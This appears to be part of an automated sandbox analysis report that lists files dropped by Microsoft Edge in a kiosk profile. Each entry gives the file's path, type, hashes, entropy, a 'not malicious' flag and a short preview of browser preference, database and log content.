C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\SCT Auditing Pending Reports~RF36812.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.36515621748816035
Encrypted:	false
SSDEEP:	24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
MD5:	25363ADC3C9D98BAD1A33D0792405CBF
SHA1:	D06E343087D86EF1A06F7479D81B26C90A60B5C3
SHA-256:	6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
SHA-512:	CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\bcb9c02c-0ed0-4563-8b0a-3587c6d03cec.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\dcbee651-d3ba-4715-86e7-bdc129cccc11.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.46731661083066856
Encrypted:	false
SSDEEP:	12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
MD5:	E93ACF0820CA08E5A5D2D159729F70E3
SHA1:	2C1A4D4924B9AEC1A796F108607404B000877C5D
SHA-256:	F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
SHA-512:	3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6292
Entropy (8bit):	4.969442165425384
Encrypted:	false
SSDEEP:	96:styqfVis1lrb90bn90YVyN8z5D+2Ys85eh6Cb7/x+6MhmuecmAem0N2M0/EJ:styJsfQ9dUNk5Dks88bV+FiA+P0MJ
MD5:	A34119765626778A790D46742232A283
SHA1:	75E9608C9175AEFA3EDAB00D132AA95F70989674
SHA-256:	FA957A038586E7A59A4FC248DE7EFF21CD986D295A6DCDFC4FF537C132E5DFD2
SHA-512:	1C7805E04B214B6DEF95DC13B632E906C891BFFCBEE964171B99D69902DE355C35BF59AFAB1C781387F6D24B0B5C7610D5BCA0888BE66588B5DF9DE4184E609E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638493353282","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"domain_diversity":{"last_reporting_timestamp":"13369638493355645"},"download":{"default_directory":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\KioskDownloads\\","directory_upgrade":true},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Preferences~RF3f994.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6292
Entropy (8bit):	4.969442165425384
Encrypted:	false
SSDEEP:	96:styqfVis1lrb90bn90YVyN8z5D+2Ys85eh6Cb7/x+6MhmuecmAem0N2M0/EJ:styJsfQ9dUNk5Dks88bV+FiA+P0MJ
MD5:	A34119765626778A790D46742232A283
SHA1:	75E9608C9175AEFA3EDAB00D132AA95F70989674
SHA-256:	FA957A038586E7A59A4FC248DE7EFF21CD986D295A6DCDFC4FF537C132E5DFD2
SHA-512:	1C7805E04B214B6DEF95DC13B632E906C891BFFCBEE964171B99D69902DE355C35BF59AFAB1C781387F6D24B0B5C7610D5BCA0888BE66588B5DF9DE4184E609E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638493353282","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"domain_diversity":{"last_reporting_timestamp":"13369638493355645"},"download":{"default_directory":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\KioskDownloads\\","directory_upgrade":true},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Preferences~RF46ed3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6292
Entropy (8bit):	4.969442165425384
Encrypted:	false
SSDEEP:	96:styqfVis1lrb90bn90YVyN8z5D+2Ys85eh6Cb7/x+6MhmuecmAem0N2M0/EJ:styJsfQ9dUNk5Dks88bV+FiA+P0MJ
MD5:	A34119765626778A790D46742232A283
SHA1:	75E9608C9175AEFA3EDAB00D132AA95F70989674
SHA-256:	FA957A038586E7A59A4FC248DE7EFF21CD986D295A6DCDFC4FF537C132E5DFD2
SHA-512:	1C7805E04B214B6DEF95DC13B632E906C891BFFCBEE964171B99D69902DE355C35BF59AFAB1C781387F6D24B0B5C7610D5BCA0888BE66588B5DF9DE4184E609E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638493353282","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"domain_diversity":{"last_reporting_timestamp":"13369638493355645"},"download":{"default_directory":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\KioskDownloads\\","directory_upgrade":true},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Preferences~RF55cae.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6292
Entropy (8bit):	4.969442165425384
Encrypted:	false
SSDEEP:	96:styqfVis1lrb90bn90YVyN8z5D+2Ys85eh6Cb7/x+6MhmuecmAem0N2M0/EJ:styJsfQ9dUNk5Dks88bV+FiA+P0MJ
MD5:	A34119765626778A790D46742232A283
SHA1:	75E9608C9175AEFA3EDAB00D132AA95F70989674
SHA-256:	FA957A038586E7A59A4FC248DE7EFF21CD986D295A6DCDFC4FF537C132E5DFD2
SHA-512:	1C7805E04B214B6DEF95DC13B632E906C891BFFCBEE964171B99D69902DE355C35BF59AFAB1C781387F6D24B0B5C7610D5BCA0888BE66588B5DF9DE4184E609E
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13369638493353282","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"domain_diversity":{"last_reporting_timestamp":"13369638493355645"},"download":{"default_directory":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\KioskDownloads\\","directory_upgrade":true},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\PreferredApps

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.051821770808046
Encrypted:	false
SSDEEP:	3:YVXADAEvTLSJ:Y9AcEvHSJ
MD5:	2B432FEF211C69C745ACA86DE4F8E4AB
SHA1:	4B92DA8D4C0188CF2409500ADCD2200444A82FCC
SHA-256:	42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
SHA-512:	948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
Malicious:	false
Preview:	{"preferred_apps":[],"version":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\README

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.2629097520179995
Encrypted:	false
SSDEEP:	3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
MD5:	643E00B0186AA80523F8A6BED550A925
SHA1:	EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
SHA-256:	A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
SHA-512:	D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
Malicious:	false
Preview:	Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24799
Entropy (8bit):	5.5657063143726075
Encrypted:	false
SSDEEP:	768:/2oys/WP7zfRc8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2jzbprww1pGtuq:/2oys/WP7zfRcu1javnba7tZ
MD5:	378CEB3B8E31FEB38B902574140F87E7
SHA1:	E9CB39B159B7B8E446AF34D786C4B2BCB1413D98
SHA-256:	1FBB2404BC08BE91B3443370D2064CBEC24472F98C4026B6007C7E99C80DF899
SHA-512:	49B54AFAFDA850D2BAA4E066D870036A146CDD201158BCEDA8F76E127A2B440306AA2884B4A08C5BB14F92C8859ACF1640CAC4C2E2EF15230E9667F5C3364926
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13369638492823597","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13369638492823597","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Secure Preferences~RF3c729.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24799
Entropy (8bit):	5.5657063143726075
Encrypted:	false
SSDEEP:	768:/2oys/WP7zfRc8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2jzbprww1pGtuq:/2oys/WP7zfRcu1javnba7tZ
MD5:	378CEB3B8E31FEB38B902574140F87E7
SHA1:	E9CB39B159B7B8E446AF34D786C4B2BCB1413D98
SHA-256:	1FBB2404BC08BE91B3443370D2064CBEC24472F98C4026B6007C7E99C80DF899
SHA-512:	49B54AFAFDA850D2BAA4E066D870036A146CDD201158BCEDA8F76E127A2B440306AA2884B4A08C5BB14F92C8859ACF1640CAC4C2E2EF15230E9667F5C3364926
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13369638492823597","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13369638492823597","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Session Storage\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.160877598186631
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljljljl:S85aEFljljljl
MD5:	7733303DBE19B64C38F3DE4FE224BE9A
SHA1:	8CA37B38028A2DB895A4570E0536859B3CC5C279
SHA-256:	B10C1BA416A632CD57232C81A5C2E8EE76A716E0737D10EABE1D430BEC50739D
SHA-512:	E8CD965BCA0480DB9808CB1B461AC5BF5935C3CBF31C10FDF090D406F4BC4F3187D717199DCF94197B8DF24C1D6E4FF07241D8CFFFD9AEE06CCE9674F0220E29
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Session Storage\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.076012001628259
Encrypted:	false
SSDEEP:	6:PIs2R1923oH+TcwtSQM72KLllIsJTN+q2P923oH+TcwtSQMxIFUv:PIuYeb0LnIAN+v4YebrFUv
MD5:	D16C68A7C527ACE1FC1B971AEA9EC4AE
SHA1:	BA5142543EF7496BDF37A3552D26788243754914
SHA-256:	27A0136C74FD4726A37DE2F34D85C8CB57BBA6205414BB6AC14B68697E0E4569
SHA-512:	C3E7E595C7E2ECFBD8894F936FC4149F64FCE7F6B2CBF7838C0F9F0FC8465CD73AC64BE32912AA5A5ABA1FCA40EAD3369EB4DB34C1362CB1F138FA4051860884
Malicious:	false
Preview:	2024/09/01-00:28:29.910 1dec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Session Storage since it was missing..2024/09/01-00:28:29.948 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Session Storage/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Session Storage\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Site Characteristics Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Site Characteristics Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	3.473726825238924
Encrypted:	false
SSDEEP:	3:41tt0diERGn:et084G
MD5:	148079685E25097536785F4536AF014B
SHA1:	C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
SHA-256:	F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
SHA-512:	C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
Malicious:	false
Preview:	.On.!................database_metadata.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Site Characteristics Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.110076227542646
Encrypted:	false
SSDEEP:	6:PIQpVE1923oH+TcwtgUh2gr52KLllItEQ+q2P923oH+TcwtgUh2ghZIFUv:PIQpDYeb3hHJLnIyv4Yeb3hHh2FUv
MD5:	638F431F93750014D0B457F63018D286
SHA1:	4545D9C17549B92E55A857B1BDE36CB91FB317A3
SHA-256:	A869E486E3E72A47D9BEF944F459D4AB76F0137BA59F79BDD5FD25C180BB6F64
SHA-512:	29CEAE1767D54B26BBCBEA0C997B651A520CD165E111EEDEA6D783B14EFF4BA815EC26EB871B5B4CA29E09BBBE615AC58894EE4741EDDDE8CA1273AF97466F61
Malicious:	false
Preview:	2024/09/01-00:28:12.837 1d68 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Site Characteristics Database since it was missing..2024/09/01-00:28:13.041 1d68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Site Characteristics Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Site Characteristics Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
